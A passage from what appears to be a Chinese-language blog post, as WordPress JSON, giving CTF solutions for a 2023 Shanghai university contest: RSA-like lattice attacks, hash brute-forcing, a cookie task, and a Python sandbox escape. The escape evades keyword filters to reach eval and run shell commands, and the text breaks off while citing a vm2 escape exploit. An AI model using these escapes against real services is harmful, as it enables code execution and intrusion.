{"id":1816,"date":"2023-05-21T13:19:09","date_gmt":"2023-05-21T05:19:09","guid":{"rendered":"https:\/\/fushuling.com\/?p=1816"},"modified":"2023-07-31T14:42:01","modified_gmt":"2023-07-31T06:42:01","slug":"%e7%ac%ac%e5%85%ab%e5%b1%8a%e4%b8%8a%e6%b5%b7%e5%b8%82%e5%a4%a7%e5%ad%a6%e7%94%9f%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e6%9a%a8%e7%a3%90%e7%9f%b3%e8%a1%8c%e5%8a%a820","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/05\/21\/%e7%ac%ac%e5%85%ab%e5%b1%8a%e4%b8%8a%e6%b5%b7%e5%b8%82%e5%a4%a7%e5%ad%a6%e7%94%9f%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e6%9a%a8%e7%a3%90%e7%9f%b3%e8%a1%8c%e5%8a%a820\/","title":{"rendered":"\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u9080\u8bf7\u8d5b"},"content":{"rendered":"\n<p>\u54ce\uff0c\u4e00\u5929\u5c31\u6211\u4e00\u4e2a\u4eba\u5728\u6253\uff0c\u961f\u53cb\u7ed9\u529b\u70b9\u5e94\u8be5\u5c31\u664b\u7ea7\u4e86\uff0c\u6c34\u5b50\u54e5\u80cc\u9505\uff0c\u4e0d\u8fc7\u81ea\u5df1\u83dc\u4e5f\u662f\u4e3b\u8981\u539f\u56e0\ud83d\ude04<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">crypto<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">bird<\/h2>\n\n\n\n<p>\u53bb\u5728\u7ebf\u7f51\u7ad9<a href=\"https:\/\/www.dcode.fr\/birds-on-a-wire-cipher\">https:\/\/www.dcode.fr\/birds-on-a-wire-cipher<\/a>\u4e00\u4e2a\u4e00\u4e2a\u5bf9\u7167\uff0c\u6700\u540eflag:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{birdislovely}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">RSA_like<\/h2>\n\n\n\n<p>\u548cmini LCTF 2023\u7684<a href=\"https:\/\/blog.csdn.net\/weixin_52640415\/article\/details\/130547942\">not_RSA<\/a>\u4e00\u6837\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># sage\nimport random\nfrom Crypto.Util.number import *\nfrom gmpy2 import *\nimport time\n\n############################################\n# Config\n##########################################\n\n\"\"\"\nSetting debug to true will display more informations\nabout the lattice, the bounds, the vectors...\n\"\"\"\ndebug = True\n\n\"\"\"\nSetting strict to true will stop the algorithm (and\nreturn (-1, -1)) if we don't have a correct \nupperbound on the determinant. Note that this \ndoesn't necesseraly mean that no solutions \nwill be found since the theoretical upperbound is\nusualy far away from actual results. That is why\nyou should probably use `strict = False`\n\"\"\"\nstrict = False\n\n\"\"\"\nThis is experimental, but has provided remarkable results\nso far. It tries to reduce the lattice as much as it can\nwhile keeping its efficiency. I see no reason not to use\nthis option, but if things don't work, you should try\ndisabling it\n\"\"\"\nhelpful_only = True\ndimension_min = 7  # stop removing if lattice reaches that dimension\n\n\n############################################\n# Functions\n##########################################\n\n# display stats on helpful vectors\ndef helpful_vectors(BB, modulus):\n    nothelpful = 0\n    for ii in range(BB.dimensions()&#91;0]):\n        if BB&#91;ii, ii] >= modulus:\n            nothelpful += 1\n\n    print(nothelpful, \"\/\", BB.dimensions()&#91;0], \" vectors are not helpful\")\n\n\n# display matrix picture with 0 and X\ndef matrix_overview(BB, bound):\n    for ii in range(BB.dimensions()&#91;0]):\n        a = ('%02d ' % ii)\n        for jj in range(BB.dimensions()&#91;1]):\n            a += '0' if BB&#91;ii, jj] == 0 else 'X'\n            if BB.dimensions()&#91;0] &lt; 60:\n                a += ' '\n        if BB&#91;ii, ii] >= bound:\n            a += '~'\n        print(a)\n\n\n# tries to remove unhelpful vectors\n# we start at current = n-1 (last vector)\ndef remove_unhelpful(BB, monomials, bound, current):\n    # end of our recursive function\n    if current == -1 or BB.dimensions()&#91;0] &lt;= dimension_min:\n        return BB\n\n    # we start by checking from the end\n    for ii in range(current, -1, -1):\n        # if it is unhelpful:\n        if BB&#91;ii, ii] >= bound:\n            affected_vectors = 0\n            affected_vector_index = 0\n            # let's check if it affects other vectors\n            for jj in range(ii + 1, BB.dimensions()&#91;0]):\n                # if another vector is affected:\n                # we increase the count\n                if BB&#91;jj, ii] != 0:\n                    affected_vectors += 1\n                    affected_vector_index = jj\n\n            # level:0\n            # if no other vectors end up affected\n            # we remove it\n            if affected_vectors == 0:\n                print(\"* removing unhelpful vector\", ii)\n                BB = BB.delete_columns(&#91;ii])\n                BB = BB.delete_rows(&#91;ii])\n                monomials.pop(ii)\n                BB = remove_unhelpful(BB, monomials, bound, ii - 1)\n                return BB\n\n            # level:1\n            # if just one was affected we check\n            # if it is affecting someone else\n            elif affected_vectors == 1:\n                affected_deeper = True\n                for kk in range(affected_vector_index + 1, BB.dimensions()&#91;0]):\n                    # if it is affecting even one vector\n                    # we give up on this one\n                    if BB&#91;kk, affected_vector_index] != 0:\n                        affected_deeper = False\n                # remove both it if no other vector was affected and\n                # this helpful vector is not helpful enough\n                # compared to our unhelpful one\n                if affected_deeper and abs(bound - BB&#91;affected_vector_index, affected_vector_index]) &lt; abs(\n                        bound - BB&#91;ii, ii]):\n                    print(\"* removing unhelpful vectors\", ii, \"and\", affected_vector_index)\n                    BB = BB.delete_columns(&#91;affected_vector_index, ii])\n                    BB = BB.delete_rows(&#91;affected_vector_index, ii])\n                    monomials.pop(affected_vector_index)\n                    monomials.pop(ii)\n                    BB = remove_unhelpful(BB, monomials, bound, ii - 1)\n                    return BB\n    # nothing happened\n    return BB\n\n\ndef attack(N, e, m, t, X, Y):\n    modulus = e\n\n    PR.&lt;x,y> = PolynomialRing(ZZ)\n    a = N + 1\n    b = N * N - N + 1\n    f = x * (y * y + a * y + b) + 1\n\n    gg = &#91;]\n    for k in range(0, m + 1):\n        for i in range(k, m + 1):\n            for j in range(2 * k, 2 * k + 2):\n                gg.append(x ^ (i - k) * y ^ (j - 2 * k) * f ^ k * e ^ (m - k))\n    for k in range(0, m + 1):\n        for i in range(k, k + 1):\n            for j in range(2 * k + 2, 2 * i + t + 1):\n                gg.append(x ^ (i - k) * y ^ (j - 2 * k) * f ^ k * e ^ (m - k))\n\n    def order_gg(idx, gg, monomials):\n        if idx == len(gg):\n            return gg, monomials\n\n        for i in range(idx, len(gg)):\n            polynomial = gg&#91;i]\n            non = &#91;]\n            for monomial in polynomial.monomials():\n                if monomial not in monomials:\n                    non.append(monomial)\n\n            if len(non) == 1:\n                new_gg = gg&#91;:]\n                new_gg&#91;i], new_gg&#91;idx] = new_gg&#91;idx], new_gg&#91;i]\n\n                return order_gg(idx + 1, new_gg, monomials + non)\n\n    gg, monomials = order_gg(0, gg, &#91;])\n\n    # construct lattice B\n    nn = len(monomials)\n    BB = Matrix(ZZ, nn)\n    for ii in range(nn):\n        BB&#91;ii, 0] = gg&#91;ii](0, 0)\n        for jj in range(1, nn):\n            if monomials&#91;jj] in gg&#91;ii].monomials():\n                BB&#91;ii, jj] = gg&#91;ii].monomial_coefficient(monomials&#91;jj]) * monomials&#91;jj](X, Y)\n\n    # Prototype to reduce the lattice\n    if helpful_only:\n        # automatically remove\n        BB = remove_unhelpful(BB, monomials, modulus ^ m, nn - 1)\n        # reset dimension\n        nn = BB.dimensions()&#91;0]\n        if nn == 0:\n            print(\"failure\")\n            return 0, 0\n\n    # check if vectors are helpful\n    if debug:\n        helpful_vectors(BB, modulus ^ m)\n\n    # check if determinant is correctly bounded\n    det = BB.det()\n    bound = modulus ^ (m * nn)\n    if det >= bound:\n        print(\"We do not have det &lt; bound. Solutions might not be found.\")\n        print(\"Try with highers m and t.\")\n        if debug:\n            diff = (log(det) - log(bound)) \/ log(2)\n            print(\"size det(L) - size e^(m*n) = \", floor(diff))\n        if strict:\n            return -1, -1\n    else:\n        print(\"det(L) &lt; e^(m*n) (good! If a solution exists &lt; N^delta, it will be found)\")\n\n    # display the lattice basis\n    if debug:\n        matrix_overview(BB, modulus ^ m)\n\n    # LLL\n    if debug:\n        print(\"optimizing basis of the lattice via LLL, this can take a long time\")\n\n    BB = BB.LLL()\n\n    if debug:\n        print(\"LLL is done!\")\n\n    # transform vector i &amp; j -> polynomials 1 &amp; 2\n    if debug:\n        print(\"looking for independent vectors in the lattice\")\n    found_polynomials = False\n\n    for pol1_idx in range(nn - 1):\n        for pol2_idx in range(pol1_idx + 1, nn):\n            # for i and j, create the two polynomials\n            PR.&lt;a,b> = PolynomialRing(ZZ)\n            pol1 = pol2 = 0\n            for jj in range(nn):\n                pol1 += monomials&#91;jj](a, b) * BB&#91;pol1_idx, jj] \/ monomials&#91;jj](X, Y)\n                pol2 += monomials&#91;jj](a, b) * BB&#91;pol2_idx, jj] \/ monomials&#91;jj](X, Y)\n\n            # resultant\n            PR.&lt;q> = PolynomialRing(ZZ)\n            rr = pol1.resultant(pol2)\n\n            # are these good polynomials?\n            if rr.is_zero() or rr.monomials() == &#91;1]:\n                continue\n            else:\n                print(\"found them, using vectors\", pol1_idx, \"and\", pol2_idx)\n                found_polynomials = True\n                break\n        if found_polynomials:\n            break\n\n    if not found_polynomials:\n        print(\"no independant vectors could be found. This should very rarely happen...\")\n        return 0, 0\n\n    rr = rr(q, q)\n\n    # solutions\n    soly = rr.roots()\n\n    if len(soly) == 0:\n        print(\"Your prediction (delta) is too small\")\n        return 0, 0\n\n    soly = soly&#91;0]&#91;0]\n    ss = pol1(q, soly)\n    solx = ss.roots()&#91;0]&#91;0]\n\n    return solx, soly\n\n\ndef inthroot(a, n):\n    return a.nth_root(n, truncate_mode=True)&#91;0]\n\n\ndef generate_prime(bit_length):\n    while True:\n        a = random.getrandbits(bit_length \/\/ 2)\n        b = random.getrandbits(bit_length \/\/ 2)\n\n        if b % 3 == 0:\n            continue\n\n        p = a ** 2 + 3 * b ** 2\n        if p.bit_length() == bit_length and p % 3 == 1 and isPrime(p):\n            return p\n\n\ndef point_addition(P, Q, mod):\n    m, n = P\n    p, q = Q\n\n    if p is None:\n        return P\n    if m is None:\n        return Q\n\n    if n is None and q is None:\n        x = m * p % mod\n        y = (m + p) % mod\n        return (x, y)\n\n    if n is None and q is not None:\n        m, n, p, q = p, q, m, n\n\n    if q is None:\n        if (n + p) % mod != 0:\n            x = (m * p + 2) * inverse(n + p, mod) % mod\n            y = (m + n * p) * inverse(n + p, mod) % mod\n            return (x, y)\n        elif (m - n ** 2) % mod != 0:\n            x = (m * p + 2) * inverse(m - n ** 2, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n    else:\n        if (m + p + n * q) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod\n            y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod\n            return (x, y)\n        elif (n * p + m * q + 2) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(n * p + m * q + r, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n\n\ndef special_power(P, a, mod):\n    res = (None, None)\n    t = P\n    while a > 0:\n        if a &amp; 1:\n            res = point_addition(res, t, mod)\n        t = point_addition(t, t, mod)\n        a >>= 1\n    return res\n\n\ndef random_padding(message, length):\n    pad = bytes(&#91;random.getrandbits(8) for _ in range(length - len(message))])\n    return message + pad\n\n\n\nc = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)\nN = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877\ne = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038\n\nX = 1 &lt;&lt; 469\nY = 2 * inthroot(Integer(2 * N), 2)\n\nres = attack(N, e, 4, 2, X, Y)\nprint(res)  # gives k and p + q, the rest is easy\n\nb, c = res&#91;1], N\nDsqrt = inthroot(Integer(b ^ 2 - 4 * c), 2)\np, q = (b + Dsqrt) \/\/ 2, (b - Dsqrt) \/\/ 2\nassert p * q == N\nprint(p,q)\n<\/code><\/pre>\n\n\n\n<p>\u6c42\u51fapq\u540e\u5e26\u5165\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># python\nimport random\nfrom Crypto.Util.number import *\nfrom gmpy2 import *\n\nc = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)\nN = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877\ne = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038\np,q=12076532702818803027742169983530419558608401078508017894707093811716696786941308547797368731019670776508448150953432566915232808757060410156378938522359551,9504548564498461029558227822137431209369699669992479992757942960885213061136352518231937836400544570835645335056229054429984730840065504477100420427103027\n\nprint(p*q==N)\n\ndef generate_prime(bit_length):\n    while True:\n        a = random.getrandbits(bit_length \/\/ 2)\n        b = random.getrandbits(bit_length \/\/ 2)\n\n        if b % 3 == 0:\n            continue\n\n        p = a ** 2 + 3 * b ** 2\n        if p.bit_length() == bit_length and p % 3 == 1 and isPrime(p):\n            return p\n\n\ndef point_addition(P, Q, mod):\n    m, n = P\n    p, q = Q\n\n    if p is None:\n        return P\n    if m is None:\n        return Q\n\n    if n is None and q is None:\n        x = m * p % mod\n        y = (m + p) % mod\n        return (x, y)\n\n    if n is None and q is not None:\n        m, n, p, q = p, q, m, n\n\n    if q is None:\n        if (n + p) % mod != 0:\n            x = (m * p + 2) * inverse(n + p, mod) % mod\n            y = (m + n * p) * inverse(n + p, mod) % mod\n            return (x, y)\n        elif (m - n ** 2) % mod != 0:\n            x = (m * p + 2) * inverse(m - n ** 2, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n    else:\n        if (m + p + n * q) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod\n            y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod\n            return (x, y)\n        elif (n * p + m * q + 2) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(n * p + m * q + r, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n\n\ndef special_power(P, a, mod):\n    res = (None, None)\n    t = P\n    while a > 0:\n        if a &amp; 1:\n            res = point_addition(res, t, mod)\n        t = point_addition(t, t, mod)\n        a >>= 1\n    return res\n\n\ndef random_padding(message, length):\n    pad = bytes(&#91;random.getrandbits(8) for _ in range(length - len(message))])\n    return message + pad\n\n# \u8ddfNovelSystem\u7a0d\u6709\u533a\u522b,\u8fd9\u91cc\u53ef\u4ee5\u7b97\u51faphi\u6c42\u51fad,\u89e3\u5bc6\u65b9\u5f0f\u548c\u52a0\u5bc6\u7528\u540c\u4e00\u51fd\u6570\nphi = (p**2 + p + 1)*(q**2 + q + 1)\nd = invert(e,phi)\nm = special_power(c,d,N)\nflag = b''.join(&#91;long_to_bytes(v)&#91;:19] for v in m])\nprint(flag)\n#flag{4872c7e4cc11508f8325f6fb68512a23}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">crackme<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"852\" height=\"361\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1817\"  sizes=\"auto, (max-width: 852px) 100vw, 852px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">dirty_flag<\/h2>\n\n\n\n<p>python\u591a\u7ebf\u7a0b\u7206\u7834\uff0c\u53ef\u4ee5\u901a\u8fc7leave\u7206\u7834\u5f97\u5230flag\u7684\u5404\u4e2a\u5757<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import hashlib\r\nimport itertools\r\nfrom string import digits\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    tree = &#91;'55cfb0b1cf88f01fc9ed2956a02f90f9014d47ad303dbb52fe7d331ddea37d88',\r\n            'b665a90585127215c576871b867e203e5a00107d11824d34ba2cb5f7c4fd9682',\r\n            '4cac70a760893573e0e5e90f44547e9dc5a53a9f414d36bc24d2d6fd03970ec2',\r\n            '28c372a73cc57472fd1f0e8442115ee2ac53be83800eae6594b8aa9b4c7d48f6',\r\n            '398563820c257329e66a7fffe9e0ce512b54261378dbd329222a7729ca0484fc',\r\n            'a36ac422a339e2b40596b5162b22f89d27a27dbbc8c7292c709a069673eb470b',\r\n            'd35886043eee094a310136ae21c4c7af5bcd7c68e6a547cbd5069dd6baee1a63',\r\n            '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b',\r\n            '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b',\r\n            'a64cd974e0dbd6f6a289ebd2080ffb6e8ac47f794e02cde4db2239c42f63b6ba',\r\n            'e813a50278e41a5ea532c95f99ab616d4ec1ffabad99e1c8fde23886bb600005',\r\n            '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5',\r\n            '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5',\r\n            'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2',\r\n            'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2']\r\n    # flag = &#91;'flag{09xxxxxx', 'xxxx', 'xxxx', 'xxxx', 'xxxxxx755ca2}']\r\n    alpha_bet = digits + 'abcdef'\r\n    strlist = itertools.product(alpha_bet, repeat=6)\r\n\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3] + i&#91;4] + i&#91;5]\r\n        data_sha = hashlib.sha256(('flag{09' + data).encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            break\r\n\r\n\r\n    strlist = itertools.product(alpha_bet, repeat=4)\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3]\r\n        data_sha = hashlib.sha256(data.encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            print(tree.index(data_sha))\r\n\r\n\r\n    strlist = itertools.product(alpha_bet, repeat=6)\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3] + i&#91;4] + i&#91;5]\r\n        data_sha = hashlib.sha256((data + '755ca2}').encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            break\r\n\r\n\r\n\"\"\"\r\n806994\r\n45ef\r\n10\r\n5a04\r\n9\r\nbde0\r\n11\r\nc69658\r\n\"\"\"\r\n# flag{09806994-5a04-45ef-bde0-c69658755ca2}<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">web<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">CookieBack<\/h2>\n\n\n\n<p>\u76f4\u63a5\u8bbf\u95ee\/cookie\u5c31\u6709\u63d0\u793a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-46.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"244\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-46.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1818\"  sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/div><\/figure>\n\n\n\n<p>\u8981\u6211\u4eec\u5077cookie\uff0c\u4e0d\u8fc7\u5b9e\u9645\u4e0a\u4f60\u4f20\u81ea\u5df1\u7684cookie\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-47-1024x196.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"196\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-47-1024x196.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1819\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">ezpython<\/h2>\n\n\n\n<p>\u7f51\u9875\u91cc\u76f4\u63a5\u53ef\u4ee5\u8ba9\u6211\u4eec\u8fd0\u884cpython\u4ee3\u7801\uff0c\u6240\u4ee5\u76f4\u63a5ssti\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>for i in range(500):\r\n    res=''\r\n    try:\r\n        res=''.__class__.__bases__&#91;0].__subclasses__()&#91;i].__init__.__globals__&#91;'__bui'+'ltins__']\r\n    except Exception as e:\r\n        pass\r\n    a='e'+'val'\r\n    if a in res:\r\n        print(i)<\/code><\/pre>\n\n\n\n<p>\u5148\u627eeval<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-48-1024x680.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-48-1024x680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1820\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u627eflag\u540d\u5b57<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>print(''.__class__.__bases__&#91;0].__subclasses__()&#91;100].__init__.__globals__&#91;'__bui'+'ltins__']&#91;'e'+'val'](\"__im\"+\"port__('o\"+\"s').po\"+\"pen('find -name flag').read()\"))<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-49-1024x422.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"422\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-49-1024x422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1821\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u76f4\u63a5cat\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>print(''.__class__.__bases__&#91;0].__subclasses__()&#91;100].__init__.__globals__&#91;'__bui'+'ltins__']&#91;'e'+'val'](\"__im\"+\"port__('o\"+\"s').po\"+\"pen('cat .\/flag').read()\"))<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">easy_node<\/h2>\n\n\n\n<p>\u8c8c\u4f3c\u662f\u4e2anday\uff0c\u53c2\u8003<a href=\"https:\/\/gist.github.com\/leesh3288\/381b230b04936dd4d74aaf90cc8bb244\">https:\/\/gist.github.com\/leesh3288\/381b230b04936dd4d74aaf90cc8bb244<\/a><\/p>\n\n\n\n<p>\u5148\u53bb\/vm2_tester\u63a5\u53e3\u6ce8\u518c\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/image3-1024x522.png'><img class=\"lazyload lazyload-style-1\" 